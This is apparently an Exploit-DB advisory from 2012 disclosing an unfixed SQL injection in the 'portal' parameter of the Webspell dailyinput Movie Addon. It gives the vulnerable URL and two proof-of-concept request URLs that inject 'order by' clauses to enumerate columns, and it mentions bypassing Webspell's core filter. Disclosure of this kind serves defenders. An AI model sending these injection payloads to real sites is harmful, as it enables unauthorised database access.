Webspell dailyinput Movie Addon 4.2.x - SQL Injection

Author: Easy Laster
type: webapps
platform: php
port: 
date_added: 2012-06-10  
date_updated: 2012-06-10  
verified: 1  
codes: OSVDB-82892  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comVideosaddon_dailyinput.de_v1.0.3_webspell_v4.2.1a.rar  

raw file: 19031.txt  

========================================================================================
| # Title    : Webspell 4.2.x dailyinput Movie-Addon SQL Injection Vulnerability
| # Author   : Easy Laster
| # Script   : Webspell 4.2.x dailyinput Movie-Addon
| # Site     : www.kode-designs.com
| # Download : www.setgaming.de/index.php?site=files&file=26
| # Demo     : www.setgaming.de/index.php?site=videos
| # Price    : free
| # Exploitation : Remote SQL Vulnerability
| # Bug      : Remote SQL Vulnerability
| # Date     : 08.06.2012
| # Language : PHP
| # Status   : vulnerable
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest
======================        Proof of Concept         =================================


  [+] Introduction

   dailyinput Movie-Addon is a Addon for the Webspell Web Application the Content Management
   System. In this Addon we found a Remote SQL Injection vulnerability.The Movie file
   is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most
   Webspell Webapplication has a Security System in the Webspell core self.You must bypass
   the core from Webspell Security System (globalskiller).


  [+] Vulnerability

    http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=[vul]

  [+] Exploit

    http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+5--+
    http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+4--+

  [+] Fix

    No fix.